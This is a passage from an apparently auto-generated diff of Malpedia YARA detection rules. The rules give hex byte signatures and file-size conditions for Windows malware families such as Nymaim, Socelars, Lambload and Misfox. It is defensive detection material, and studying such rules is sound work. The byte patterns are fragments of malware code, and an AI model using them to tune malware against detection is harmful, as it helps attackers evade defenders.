85c0 7404 } + $sequence_6 = { b8ff0f0000 6623e8 b800400000 660be8 } + $sequence_7 = { 6a08 68???????? 56 ffd7 85c0 } + $sequence_8 = { 50 ff15???????? a3???????? 85c0 74e7 } + $sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 33c0 } + $sequence_10 = { 59 57 8bf0 ff15???????? 8bc6 } + $sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 } + $sequence_12 = { 8bc6 8703 3bc6 74f8 } + $sequence_13 = { 56 6a04 53 57 } + $sequence_14 = { 7705 80ea61 eb0a 8d42bf } + $sequence_15 = { 03c1 8b4d14 8901 33c0 40 } + $sequence_16 = { e9???????? 8ac1 c1e904 c0e004 } + $sequence_17 = { 8ac8 240f 80e1f0 80c110 32c8 } + $sequence_18 = { 3c41 7c11 3c46 7f0d } + $sequence_19 = { 48397c2430 7505 bb01000000 8bc3 } + $sequence_20 = { 4885c0 7440 ff15???????? 488b0b 33ff 3db7000000 } + $sequence_21 = { 0f84ff000000 3d00010000 7320 488b0b } + $sequence_22 = { 420fb61408 8bc1 ffc1 42881408 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <1027072 } -rule MALPEDIA_Win_Banatrix_Auto : FILE +rule MALPEDIA_Win_Lambload_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dddc42c8-ebb5-5b25-8e19-698be8f181ff" + id = "ca98537a-be45-5b55-a54c-745fd9ea79b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banatrix_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lambload_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "ad75928262b7ab312e9d49af768e2651c88b8c026115565bb62125e134a2e0bd" + logic_hash = "6692a5aefbbf1fabc4e1d13310c5f00b33c64ae692d0893f079fb461da4727d8" score = 75 quality = 75 tags = "FILE" @@ -174871,32 +177586,32 @@ rule MALPEDIA_Win_Banatrix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83ec10 894208 89f7 31c0 f3aa } - $sequence_1 = { e8???????? 8b4304 85c0 741b c744240800800000 c744240400000000 } - $sequence_2 = { c744240806000000 893c24 c1e804 40 0fb7c0 } - $sequence_3 = { 8b5320 0345d0 89542404 890424 } - $sequence_4 = { e9???????? e8???????? c744240824000000 c744240400000000 } - $sequence_5 = { 51 c9 c3 55 89e5 57 } - $sequence_6 = { 83ec10 85c0 8945d4 7542 8b45d0 c744240c04000000 c744240800300000 } - $sequence_7 = { 8b75d0 8b7dd4 2b7e34 897dcc 7514 8b7304 } - $sequence_8 = { 83787c00 7511 c704247f000000 e8???????? 31c0 51 eb66 } - $sequence_9 = { 85c0 56 56 7416 8b03 c745d000000000 } + $sequence_0 = { ffb5e4f7ffff e8???????? 0fb74624 57 57 6a03 } + $sequence_1 = { ff15???????? 47 83ff02 7caa 83c8ff 5f 5e } + $sequence_2 = { 74c5 57 57 57 ff7608 ff15???????? 85c0 } + $sequence_3 = { 8b6c2424 83c408 3be8 7e02 8be8 } + $sequence_4 = { 897dfc 897dd8 83ff40 0f8d3b010000 8b34bd00490710 85f6 } + $sequence_5 = { 83c420 837e1804 750d b800308000 } + $sequence_6 = { f7f9 8955fc e8???????? 99 b9ffff0000 f7f9 } + $sequence_7 = { be???????? 50 a5 e8???????? 83c40c } + $sequence_8 = { 0fb78c05ecfbffff 66898c05f4fdffff 83c002 663bce 75e8 53 8d85ecfbffff } + $sequence_9 = { 33c0 8a540430 8a8be8330710 32ca 888be8330710 43 3bdd } condition: - 7 of them and filesize <180224 + 7 of them and filesize <1039360 } -rule MALPEDIA_Win_Turian_Auto : FILE +rule MALPEDIA_Win_Onliner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ddf0a4a2-a5a9-518b-8b9f-2682f3c9390d" + id = "c0a25174-badc-5a1b-a67c-48cbb1aef2be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turian_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onliner_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "9c66c121bddd393e74452e6591ffaf152302a762e1679695f5fb6277ed317972" + logic_hash = "6df36365f1b8dbe7cdb1d0b03d64f7da847c99d2518d7b5ebc1610f68ca3a069" score = 75 quality = 75 tags = "FILE" @@ -174910,32 +177625,32 @@ rule MALPEDIA_Win_Turian_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 89450c 8bf8 33c0 } - $sequence_1 = { e8???????? 83c404 85c0 740d 8d4c2410 51 } - $sequence_2 = { ffd7 8b3d???????? 53 ffd7 56 ffd7 83c408 } - $sequence_3 = { 81ec88000000 53 55 56 57 b921000000 33c0 } - $sequence_4 = { 85c0 750a 5f 5e 5d 81c49c000000 c3 } - $sequence_5 = { 729b 53 ff15???????? 83c404 a1???????? 85c0 750f } - $sequence_6 = { 72ba 68???????? ff15???????? 5f 5e 5d 83c8ff } - $sequence_7 = { 66a3???????? 5b c3 6a3f 50 } - $sequence_8 = { 7403 c60000 68???????? 56 ffd7 85c0 } - $sequence_9 = { ffd5 85c0 750e 8d4f46 8d5642 } + $sequence_0 = { 0f8274ffffff 6683ff04 0f8596000000 33ff 8d45e4 668b55ee c1e202 } + $sequence_1 = { 8d8db4feffff 8bd3 8bc6 8b38 ff570c 8b85b4feffff 5a } + $sequence_2 = { 85c0 7405 3b50fc 7205 e8???????? 42 8d4410ff } + $sequence_3 = { 50 6a00 8bc3 e8???????? 50 ff15???????? } + $sequence_4 = { 3b45e4 0f84ab000000 ff45e4 807dee00 742c 8b55e4 2bd0 } + $sequence_5 = { 3345fc 03c6 0345cc 05c8fbd3e7 ba14000000 e8???????? 03c7 } + $sequence_6 = { 8bda 8bf0 8bc3 ba02000000 e8???????? 8bc3 e8???????? } + $sequence_7 = { 33c0 8945ec 837df000 7426 83caff 8b45f8 } + $sequence_8 = { 3bc3 7c07 807c1eff20 74f4 57 b9ffffff7f 8bd3 } + $sequence_9 = { 8b45fc 8b88d0010000 ba02000000 8b45fc 8b18 ff534c ff75e4 } condition: - 7 of them and filesize <645120 + 7 of them and filesize <1736704 } -rule MALPEDIA_Win_Vsingle_Auto : FILE +rule MALPEDIA_Win_Socelars_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "39c4d7b9-45d8-55fa-afdc-e3bdbe3bcacd" + id = "b06c7ac2-d920-55f6-9edd-c06a57d2d404" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vsingle_auto.yar#L1-L182" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socelars_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "83d89a8e2f1a1d70a66e028468bac58cc5e5d328eca56cc57ee9f6d9e54be732" + logic_hash = "29f15e383674389295d6d5d873e2a8fae68e30508b53f5e863e0aef43fe3264f" score = 75 quality = 75 tags = "FILE" @@ -174949,40 +177664,34 @@ rule MALPEDIA_Win_Vsingle_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c408 8945ec 8b4dec 8b550c 8d440a01 89450c 8b4d0c } - $sequence_1 = { 8955b8 eb14 8b45c0 83c004 8945c0 8b4dbc 83c102 } - $sequence_2 = { 83c408 8985f0feffff 83bdf0feffff00 7507 33c0 e9???????? 8b95f0feffff } - $sequence_3 = { 52 680c030000 8b4508 50 } - $sequence_4 = { 83c408 8985f4eeffff 8b95f4eeffff 8995f0eeffff c745fc00000000 8b85f0eeffff } - $sequence_5 = { 8955b8 8b45d0 83c001 8945d0 837db803 7d0c 6a3d } - $sequence_6 = { 83c408 898500efffff 83bd00efffffff 7529 8b9504efffff 52 8d8524f7ffff } - $sequence_7 = { 33c0 8945e9 8945ed 8945f1 8945f5 8845f9 } - $sequence_8 = { 50 b807752b15 81f0467f1fbf 81f08c7668e6 81e8d57c5c4c 8b0c28 } - $sequence_9 = { 82e8ef e9???????? 52 53 bb4c969f2a 81f3b4d3bba6 81c3c02d0a2f } - $sequence_10 = { 81c7745e2200 81c736b60a42 81c7b551a68d 81f7e7564bc6 897c2404 } - $sequence_11 = { bbf93d64ba 81f345ba76fc 81f381c713f5 81f34d7b2ffd 81f346dc0990 81c33217d821 8b142b } - $sequence_12 = { 5b 57 50 b86a45ae9f 81c07b6673f5 81f081118d0d } - $sequence_13 = { bb86d72160 e9???????? 59 51 b9cf4a22af } - $sequence_14 = { 81eb96c3a483 668b0c18 5b 53 bbd7e0d126 81f3b7cf22ba 81c3282d094f } - $sequence_15 = { e9???????? bf756ddf55 81f7960c0426 eb36 81c7745e2200 81c736b60a42 } + $sequence_0 = { f6462808 894618 7515 8b4c243c ba14000000 e8???????? 89842430010000 } + $sequence_1 = { 8b4dfc 83b9cc03000020 7409 c745c00c000000 eb07 c745c00e000000 8b55fc } + $sequence_2 = { ff460c 807e0a00 750a 8bce e8???????? 8a4e09 8b430c } + $sequence_3 = { ff730c ff7308 e8???????? 8bf8 83c410 85ff 0f8480000000 } + $sequence_4 = { 8b542410 8b5248 f6421c20 0f8437050000 8b4214 ff4878 8b8888000000 } + $sequence_5 = { e9???????? 8b4c243c 33c0 89842430010000 ba43000000 8b472c 40 } + $sequence_6 = { f7da 56 1bd2 83c235 eb55 6a00 ff77c4 } + $sequence_7 = { e8???????? 83c40c eb36 8d4201 898188000000 8d0c92 8b442438 } + $sequence_8 = { fe4613 8a4619 fec8 0fb6c8 884619 3bf9 7d24 } + $sequence_9 = { ff742424 e8???????? 83c40c eb32 8b54241c 8d4101 898688000000 } condition: - 7 of them and filesize <940032 + 7 of them and filesize <2151424 } -rule MALPEDIA_Win_Simda_Auto : FILE +rule MALPEDIA_Win_Nymaim_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "be795d70-d5c5-5e96-885a-c6d393925d47" + id = "6fe09b40-4e7e-5960-9e2c-823057d831db" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.simda_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nymaim_auto.yar#L1-L281" license_url = "N/A" - logic_hash = "3de0f7a52fa615dd54916d8a958f210fe06f4ad101457fb659a131786ec59f6f" + logic_hash = "0c0c73586cb65f92c931bae46a77127eb659bbbab03ac07a837f2712a17a227b" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -174994,32 +177703,51 @@ rule MALPEDIA_Win_Simda_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 c745fc04010000 a4 e8???????? } - $sequence_1 = { 3bce 8945f4 1bc0 40 57 895dfc } - $sequence_2 = { c7049f00000000 75f6 8b0f 894d08 } - $sequence_3 = { 760d 8b7d08 83c704 8d4eff 33c0 } - $sequence_4 = { c1e110 0b4df4 03d6 83ceff 2bca } - $sequence_5 = { 8b0d???????? 8945d4 a1???????? 8955dc 0fb615???????? } - $sequence_6 = { c1eb10 3bce 7601 4b c1ef10 } - $sequence_7 = { 83c408 85c0 74e4 6a0a 6a00 56 c60000 } - $sequence_8 = { 8bd1 c1ea10 8955ec 8bf8 } - $sequence_9 = { 41 eb08 83c102 eb03 83c103 } + $sequence_0 = { 89d8 01c8 31d2 f7f7 } + $sequence_1 = { 0f94c1 09c8 6bc064 09c0 } + $sequence_2 = { 31d2 f7f7 92 31d2 } + $sequence_3 = { 92 31d2 bf64000000 f7f7 } + $sequence_4 = { c1e105 01c8 c1c307 30c3 } + $sequence_5 = { 31c9 38f0 83d100 38d0 83d900 c1e105 } + $sequence_6 = { c1eb13 331d???????? 31c3 c1e808 } + $sequence_7 = { 00d3 8a16 301e 46 01fb } + $sequence_8 = { 8b12 8b4d0c 8b5d18 8b1b 4f 31c0 fec2 } + $sequence_9 = { 8b4e08 014e04 8b5e0c 015e08 } + $sequence_10 = { c1e808 31c3 895e0c 89d8 } + $sequence_11 = { f7e0 0fc8 01d0 894704 } + $sequence_12 = { 8b06 c1e00b 3306 8b5604 0116 8b4e08 014e04 } + $sequence_13 = { 53 56 57 83ec44 8b4508 8d0d2030d201 } + $sequence_14 = { 4409df 4531d0 813d????????7147ed3a 0f84c06efdff 4421da 4431c7 c1c703 } + $sequence_15 = { 0f84e0bffcff 443b642460 72b4 85ff 7439 837c246000 7628 } + $sequence_16 = { 4531c9 488d442440 813d????????00e8e23a 0f84c1f7feff 31d2 48b9????????00000000 488903 } + $sequence_17 = { 448915???????? 8b4548 89442448 488b8588000000 4889442440 488b8580000000 4889442438 } + $sequence_18 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 } + $sequence_19 = { 55 89e5 83ec10 8b4508 8d0d3430d201 } + $sequence_20 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 } + $sequence_21 = { 0f9e05???????? 4c89fa e8???????? 488d542440 488d8da0000000 890d???????? 8805???????? } + $sequence_22 = { 4439a19c000000 0f8456bffcff 4439a194000000 48c705????????b2228979 0f8545bffcff 8b7108 458d6c2401 } + $sequence_23 = { 31ed e8???????? 0fb7542430 488d4c2420 0fb7442432 4189d8 c1e209 } + $sequence_24 = { 5b 5d c3 8b45f0 8b0c850440d201 } + $sequence_25 = { 890424 894c2404 e8???????? 8d0d3430d201 } + $sequence_26 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 } + $sequence_27 = { 4529d8 4489da 4801ca e8???????? 66813d????????a8c1 0f848bbe0000 44295b68 } + $sequence_28 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 } condition: - 7 of them and filesize <1581056 + 7 of them and filesize <2375680 } -rule MALPEDIA_Win_Photolite_Auto : FILE +rule MALPEDIA_Win_Misfox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "91b305a0-4121-51a1-b4d2-2f8343c04744" + id = "927dd41c-de40-5a62-bc60-3c93a08d5568" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photolite_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.misfox_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "caefd484ddfe657e42e053f8e8452f60715f0696ed8aba66627e49aa5e3366fe" + logic_hash = "73f8e08e5f0adb2064a67b9bd6b00ebff7c94d43d789ff956746926b45ea1124" score = 75 quality = 75 tags = "FILE" @@ -175033,38 +177761,38 @@ rule MALPEDIA_Win_Photolite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7859802000042cc7257 c7859c02000075cc545d c785a002000040c02638 8b8594020000 8a8590020000 84c0 751e } - $sequence_1 = { ff15???????? 498bd6 488d4d76 ff15???????? 8a4301 } - $sequence_2 = { c7859405000037f43a3a c785980500002fef391c c7859c0500000be1241d c785a00500002fe54a79 8b8590050000 8a858c050000 84c0 } - $sequence_3 = { 8a85e0020000 84c0 751e 488bcb 8b848de4020000 } - $sequence_4 = { 4803cf 483bce 72e5 885c244c c744245057106c10 c7442454556a4c30 } - $sequence_5 = { 8bc3 4d03ca 85d2 7474 448bc0 } - $sequence_6 = { 7421 0f1002 488bc2 482bc6 482bc7 } - $sequence_7 = { 7307 488b7c2430 eba3 488b5c2448 } - $sequence_8 = { 48895d38 48895da0 895d30 488b01 ff5070 8bf8 85c0 } - $sequence_9 = { 488bd8 4885c0 0f8419010000 488b15???????? } - $sequence_10 = { 488bcb ffd0 ffc6 41b8bb010000 8bd6 } - $sequence_11 = { 84c0 0f85f5000000 4885db 7451 488b05???????? 4885c0 7426 } - $sequence_12 = { 72e9 4c8d442444 41b901000000 488d047e 410fb6d1 } - $sequence_13 = { 3dc8000000 0f849d000000 488b5d28 4885db } - $sequence_14 = { 75f2 33db 4084f6 0f84e6000000 } - $sequence_15 = { 488d542474 488d8de0020000 ff15???????? 408874245c } + $sequence_0 = { eb6a 56 e8???????? 59 8365fc00 8b049d50870110 } + $sequence_1 = { 3de4000000 7309 8b04c598230110 5d c3 33c0 5d } + $sequence_2 = { c705????????01000000 6a04 58 6bc000 8b4d08 8988ac830110 } + $sequence_3 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d8020770110 8945e4 } + $sequence_4 = { c745e4ec900110 a1???????? 33db 43 895de0 50 } + $sequence_5 = { ff37 c745b800000000 53 6a00 51 } + $sequence_6 = { 8b45b8 52 c70300000000 40 ff37 8945b8 } + $sequence_7 = { 0f8515010000 51 ba00020000 c744244800080000 8d4c2434 89442444 } + $sequence_8 = { 48c7c101000080 c7450b00020000 4889442420 44897507 ff15???????? } + $sequence_9 = { 458bc5 488d9530060000 4803d0 488b442448 488d0dc6da0000 } + $sequence_10 = { 488b4c2470 48894b10 48895318 e9???????? 488d5720 } + $sequence_11 = { 488985a0040000 4c8b95f8040000 488d052ce00000 4c8bd9 488d4c2430 } + $sequence_12 = { f0ff0b 7516 488d0564520100 488b4c2430 483bc8 } + $sequence_13 = { 488d15fdbc0000 483305???????? 488bcb 488905???????? ff15???????? 488d15f7bc0000 } + $sequence_14 = { ff15???????? 85c0 7547 488b0f 488d15dd6b0100 } + $sequence_15 = { 753e 0fb65530 0fb64531 66410fafd5 } condition: - 7 of them and filesize <99328 + 7 of them and filesize <266240 } -rule MALPEDIA_Win_Elise_Auto : FILE +rule MALPEDIA_Win_Exaramel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f217246a-45c9-5e4c-8fe4-ae9bb248bda8" + id = "55f2eda2-5892-5031-b695-0db68fb2d622" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.elise_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.exaramel_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "4bacbe3f48e2ba0fdae2760e38d43f9e3c8b071aa93c58355438ff735f59b16b" + logic_hash = "746a3a522250db31852461e3a3a31996745122c83c94633343076460de517b9c" score = 75 quality = 75 tags = "FILE" @@ -175078,38 +177806,32 @@ rule MALPEDIA_Win_Elise_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8461010000 8d847eee040000 50 e8???????? 85c0 } - $sequence_1 = { 8bd0 c1ea0b 0fafd7 3bf2 7312 b800080000 } - $sequence_2 = { 8bcb 8dbe06050000 f3ab 8bc2 8bcb } - $sequence_3 = { 33c9 33db 663b4e06 731a } - $sequence_4 = { 8bcf e8???????? 8365f400 c1e004 0145fc 33f6 46 } - $sequence_5 = { 894dec 8945f4 8dbeba0a0000 8bc3 8bce } - $sequence_6 = { 7cf5 33c9 888f00010000 888f01010000 } - $sequence_7 = { 8d3470 d3e0 0945f4 43 83fb04 72e1 8b45f4 } - $sequence_8 = { 888f00010000 888f01010000 8bf7 8945f8 } - $sequence_9 = { 8d3400 8b44240c 03c6 50 } - $sequence_10 = { eb02 d1e8 4e 75f1 } - $sequence_11 = { e8???????? 59 59 33c0 e9???????? 8b35???????? } - $sequence_12 = { 42 0fb6fa 8a1c07 881c06 } - $sequence_13 = { 897df4 8b7d08 03df 0fb63c06 } - $sequence_14 = { 837d0c00 8a8800010000 8a9001010000 0f8e93000000 53 } - $sequence_15 = { 301f ff45f8 8b7df8 3b7d0c 0f8c7bffffff 5f 5e } + $sequence_0 = { 8bf0 85f6 7425 8d4e02 51 e8???????? 8b4d0c } + $sequence_1 = { 83c408 85c0 7834 ff750c ff7508 ff75fc } + $sequence_2 = { 3934bd60dd4100 7531 e8???????? 8904bd60dd4100 } + $sequence_3 = { 8be5 5d c3 81f903000080 7519 ff35???????? b8???????? } + $sequence_4 = { 7439 6aff 50 ff15???????? 85c0 7538 56 } + $sequence_5 = { 50 e8???????? ffb5f0fdffff e8???????? 83c414 8b4dfc } + $sequence_6 = { ffb5a4faffff ff15???????? 85c0 0f85c1feffff 33f6 } + $sequence_7 = { 5d c3 f68594f7ffff10 746d } + $sequence_8 = { 744b 817df4e8030000 b801000000 68f0030000 0f42f0 } + $sequence_9 = { c3 8b03 8d4dec 51 6800040000 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Seduploader_Auto : FILE +rule MALPEDIA_Win_Silon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7f16d7a9-71b0-5c84-ab55-9cb76a2d5976" + id = "74e356eb-e3ab-55df-a58b-86af4144d8aa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.seduploader_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.silon_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "59b0ef9c5ade0664bc2e5b83dd5075b45d913aac7ac67fc4cf5358fb404425b7" + logic_hash = "e4ecb086584bedec65219eab1069013db28049e75ec56b31d70ca83f4cf849d8" score = 75 quality = 75 tags = "FILE" @@ -175123,32 +177845,32 @@ rule MALPEDIA_Win_Seduploader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff7630 e8???????? 83c40c 3b4508 } - $sequence_1 = { c6411001 c3 55 8bec } - $sequence_2 = { 8b4510 83c6fe 8930 8d4601 } - $sequence_3 = { 8b4510 83c6fe 8930 8d4601 50 e8???????? } - $sequence_4 = { 5e c3 55 8bec e8???????? 8b4d0c } - $sequence_5 = { 8b4510 83c6fe 8930 8d4601 50 } - $sequence_6 = { e8???????? 8b4510 83c6fe 8930 } - $sequence_7 = { ff763c e8???????? 83c40c 3b4508 } - $sequence_8 = { ff7630 e8???????? 83c40c 3b4508 } - $sequence_9 = { 50 e8???????? 8b4510 83c6fe 8930 8d4601 50 } + $sequence_0 = { 83ec18 c745f000000000 c745f400000000 c745f800000000 33c0 8945fc } + $sequence_1 = { 83c408 8945f4 837df400 7507 33c0 e9???????? c745f800000000 } + $sequence_2 = { 81ec3c020000 c785c4fdffff00000000 c745fc00000000 c745f800000000 837d0800 } + $sequence_3 = { 0fbe11 83fa61 7c20 8b4508 0345fc 0fbe08 83f97a } + $sequence_4 = { 8b4d0c 8b55f8 895104 8b45f4 50 e8???????? 83c404 } + $sequence_5 = { 6a00 8d8df4feffff 51 8d95f8feffff 52 6a01 8b4508 } + $sequence_6 = { 50 e8???????? 83c408 eb61 8b4d08 } + $sequence_7 = { e8???????? 83c404 8b55fc 52 e8???????? 83c404 8945ec } + $sequence_8 = { 8b5508 8955e8 837de800 7507 33c0 e9???????? 8b45e8 } + $sequence_9 = { 5d c20c00 ff25???????? 60 33c9 8b742424 33c0 } condition: - 7 of them and filesize <401408 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Zerot_Auto : FILE +rule MALPEDIA_Win_Scanpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8ef83190-c437-5c69-9e28-6f4ff8bb0d5f" + id = "8293fa8e-4228-517c-a26a-04301bca2110" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zerot_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scanpos_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "0536a182186ebeb3c971f24e54b07f0b9a695f53e7e594ac1e15149db29c5630" + logic_hash = "b005df89a44c0f26903a8ba8f3d418d77b4a13957700f79b1d7571fcff516771" score = 75 quality = 75 tags = "FILE" @@ -175162,32 +177884,32 @@ rule MALPEDIA_Win_Zerot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 46 81e6ff000080 7908 } - $sequence_1 = { 50 68???????? ff15???????? 8b3d???????? 8d85bcfbffff 50 } - $sequence_2 = { 6a00 ff760c ff15???????? 85c0 7430 6a00 8d85ccf9ffff } - $sequence_3 = { 8bf8 6a59 ff15???????? 85c0 b9???????? 0f45cf } - $sequence_4 = { 8b8ef2050000 8d96fa050000 e8???????? 8d8534cdffff 50 6802020000 ff15???????? } - $sequence_5 = { 85c0 740c 81bd34fcffffc8000000 7421 8b8530fcffff 40 898530fcffff } - $sequence_6 = { 8d7001 75da 8b35???????? 8d857cffffff 50 ffd6 83c002 } - $sequence_7 = { 6800020000 8d85bcfdffff 6a00 50 e8???????? 68???????? } - $sequence_8 = { 880c32 8a47f8 c0e005 02c1 880432 } - $sequence_9 = { 0f84b6000000 80bd53fcffff00 0f84a9000000 0fb74214 } + $sequence_0 = { c645b800 e8???????? c645fc01 837de810 8b45d4 } + $sequence_1 = { c745d830124100 e8???????? 8b4508 8b4dec 8945e4 40 } + $sequence_2 = { 52 57 8bfe 8d75d4 e8???????? be10000000 c645fc00 } + $sequence_3 = { 80f939 0f8fd3010000 80f930 0f8cca010000 0fbec0 0fbec9 8d848010ffffff } + $sequence_4 = { 7f04 3bcb 7611 8945d8 } + $sequence_5 = { 8b4dac c745cc0f000000 c745c800000000 c645b800 e8???????? c645fc01 } + $sequence_6 = { 50 8d4d80 e8???????? 83c40c 57 } + $sequence_7 = { 84db 7507 6a01 e8???????? 8d8de8feffff } + $sequence_8 = { 57 8d8dcbfeffff 51 6804010000 } + $sequence_9 = { 2bc1 8bcf 03c3 83cfff 2bf8 3bf9 730a } condition: - 7 of them and filesize <303104 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Mbrlock_Auto : FILE +rule MALPEDIA_Win_Open_Carrot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "daa9848d-eee7-57fa-b29b-86c1367b5691" + id = "a3d97757-e9bd-5b96-a3d4-9f325722b76a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mbrlock_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.open_carrot_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "7a0dcc0e30832e7304006fa42a5eab963221d66f36bad91605b77fec2d75b555" + logic_hash = "bc0e7aafdfe5fe87787ac92bf2b362a8818b18c35ce921dfe615312cba0c80f1" score = 75 quality = 75 tags = "FILE" @@ -175201,32 +177923,32 @@ rule MALPEDIA_Win_Mbrlock_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 898e94000000 8945e4 e9???????? 8b5d10 8b7d14 8b4e0c } - $sequence_1 = { 8bcb bd01000000 e8???????? 8bf0 85f6 0f84f8000000 85ed } - $sequence_2 = { 8b4de8 8bc1 25ffff0000 2d4c450000 7475 83e802 7433 } - $sequence_3 = { e8???????? 8b45ec 3d00800000 74ab 8b450c 8d5594 } - $sequence_4 = { 894e30 50 53 8bcf e8???????? 85c0 7505 } - $sequence_5 = { e8???????? 8bd0 85d2 7424 817f1402000080 7519 8b470c } - $sequence_6 = { 8bcf e8???????? 8b4d08 894144 8b45ec 85c0 7505 } - $sequence_7 = { 33d2 8bd9 668b144590844a00 8b4c2430 8954242c 8bc1 